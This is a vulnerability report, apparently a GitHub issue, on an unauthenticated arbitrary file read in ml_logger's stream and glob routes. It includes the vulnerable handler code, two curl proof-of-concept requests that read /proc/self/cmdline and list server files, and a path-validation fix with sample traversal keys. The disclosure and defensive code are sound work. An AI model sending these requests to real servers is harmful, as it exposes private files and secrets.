
[BUG] Unsafe file reading #74

@0x1f

Description

Summary

Insecure file read, allowing any unauthenticated user to read arbitrary files on the server.

Details

The routing handler function stream_handler in the file ml_logger/server.py reads any file.

    async def stream_handler(self, req):
        import sanic

        if not req.json:
            msg = f"request json is empty: {req.text}"
            print(msg)
            return sanic.response.text(msg)
        load_entry = LoadEntry(**req.json)
        print(f"streaming: {load_entry.key}")
        # the request-controlled key is resolved and streamed without any validation
        path = self.abs_path(load_entry.key)
        return await sanic.response.file_stream(path)

The user's input parameters are not verified or filtered.

PoC

curl -X GET -H 'Content-Type: application/json' -d '{"key":"//proc/self/cmdline","type":""}' --output - 'http://127.0.0.1:8081/stream' -v

Combined with the routing glob_handler, you can view any file on the server.

curl -X POST -H 'Content-Type: application/json' -d '{"query": "/tmp/*","wd": "/","start": 0,"stop": 9999}' 'http://127.0.0.1:8081/glob'

Impact

Read any file on the server.

Suggestions

  • Absolute paths and directory traversal files are not allowed.
  • Only allow reading of specified files.
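The two suggestions above, written out as an added example (this is not ml_logger's own code and not part of the report): a `safe_path` helper that accepts only relative keys, resolves them under a fixed log root and rejects any result that lands outside it, which covers the absolute key from the PoC (`//proc/self/cmdline`) as well as `../` traversal. `LOG_ROOT`, `UnsafeKey`, `safe_path` and `triage` are all names assumed for this example; the project's real root directory and `abs_path` implementation are not on the page.

```python
import os
import pathlib

# Hypothetical log root for the example; ml_logger's real default is not on the page.
LOG_ROOT = "/srv/ml_logger_root"


class UnsafeKey(ValueError):
    """Raised for keys that would resolve outside the log root."""


def safe_path(key: str, root: str = LOG_ROOT) -> str:
    """Return the absolute path for ``key`` inside ``root``, or raise UnsafeKey.

    Suggestion 1 from the report: absolute keys and traversal are refused.
    Suggestion 2: only files strictly below ``root`` can be named at all.
    """
    if not key or key != key.strip():
        raise UnsafeKey("empty or whitespace-padded key")
    # Reject absolute keys outright (os.path.isabs covers the "//proc/..." form
    # from the PoC) and NUL bytes, which would truncate the path in C APIs.
    if os.path.isabs(key) or key.startswith(("/", "\\")) or "\x00" in key:
        raise UnsafeKey(f"absolute key not allowed: {key!r}")
    base = pathlib.Path(root).resolve()
    # resolve() folds ".." components and follows symlinks, so a key that
    # escapes the root via either route ends up with a prefix other than base.
    candidate = (base / key).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise UnsafeKey(f"key escapes log root: {key!r}") from None
    if candidate == base:
        raise UnsafeKey("key must name a file below the root, not the root itself")
    return str(candidate)


def triage(keys):
    """Map each key to 'ok' or 'rejected' so a batch of inputs can be inspected."""
    verdicts = {}
    for key in keys:
        try:
            safe_path(key)
            verdicts[key] = "ok"
        except UnsafeKey:
            verdicts[key] = "rejected"
    return verdicts


if __name__ == "__main__":
    # Constructed sample keys: one legitimate log entry, the value from the
    # report's PoC, and a few traversal variants.
    samples = [
        "runs/exp1/metrics.pkl",
        "//proc/self/cmdline",
        "/etc/passwd",
        "../../etc/passwd",
        "runs/../../escape.txt",
        ".",
    ]
    for key, verdict in triage(samples).items():
        print(f"{verdict:8} {key!r}")
```

In the handler this replaces `path = self.abs_path(load_entry.key)`: call `safe_path(load_entry.key)` instead and answer an `UnsafeKey` with a 400 response rather than streaming. The same check applies to the `wd` and `query` values the glob route accepts, since the report shows that route being used with `wd` set to `/` to enumerate files outside the log directory.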
